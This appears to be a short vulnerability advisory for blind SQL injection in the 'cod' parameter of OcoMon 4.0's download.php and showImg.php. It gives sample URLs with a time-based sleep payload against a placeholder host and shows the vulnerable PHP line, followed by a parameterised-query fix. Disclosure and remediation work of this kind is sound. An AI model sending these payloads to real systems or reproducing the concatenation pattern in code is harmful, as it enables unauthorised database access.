CVE-2022-41391: OcoMon 4.0 - Blind SQL Injection

OcoMon v4.0 was discovered to contain a SQL injection vulnerability via the cod parameter at showImg.php.

Descriptions

During internal research I found two unauthenticated blind SQL injections in the OcoMon HelpDesk application.

Mitre Reference

CVE-2022-41390 and CVE-2022-41391.

Vulnerability

The vulnerability was exploited using Burp Suite and sqlmap:

* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/download.php?file=3134&cod=(select*from(select(sleep(40))a)

* Sample url: http://target:8000/ocomon-4.0RC1/includes/functions/showImg.php?file=3134&cod=(select*from(select(sleep(40))a)

* Vulnerable parameters: cod

* Type: blind SQL injection

Short code description

The vulnerability occurs because the code does not sanitize the 'cod' parameter, so it is possible to inject malicious code.

Example code:

if (isset($_GET['cod'])) {
    // Vulnerable: the raw 'cod' value is concatenated straight into the SQL text
    $query .= "WHERE dom_cod = " . $_GET['cod'];
}
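The fix for the pattern above, as an added example that is not OcoMon's own code or the vendor's patch: validate `cod` as an integer and pass it as a bound parameter. The `demo_files` table, the `name` column, the `findByCod` helper and the in-memory SQLite database (requires the pdo_sqlite extension) are assumptions made so the snippet runs offline; only `cod` and `dom_cod` come from the page.

```php
<?php
// Constructed stand-in database (assumption, not OcoMon's schema).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_files (dom_cod INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO demo_files VALUES (3134, 'report.pdf')");

/**
 * Hypothetical helper: returns the row for a numeric id, or null when the
 * input is not a plain positive integer or no row matches.
 */
function findByCod(PDO $pdo, $rawCod): ?array
{
    // 1. Allow-list validation: 'cod' must be a positive integer, nothing else.
    $cod = filter_var($rawCod, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cod === false) {
        return null; // reject the request instead of sending it to the database
    }

    // 2. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT dom_cod, name FROM demo_files WHERE dom_cod = :cod');
    $stmt->bindValue(':cod', $cod, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: a legitimate id, the payload shape from the sample URLs,
// a mixed value, and a missing parameter ($_GET['cod'] ?? null).
$inputs = ['3134', '(select*from(select(sleep(40))a)', '3134 OR 1=1', null];
foreach ($inputs as $in) {
    $row = findByCod($pdo, $in);
    printf("%-40s => %s\n", var_export($in, true), $row ? $row['name'] : 'rejected');
}
```

Only the first input returns a row; the other three are rejected by the integer check before any query is prepared.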

Vendor notification

https://ocomonphp.sourceforge.io/downloads/
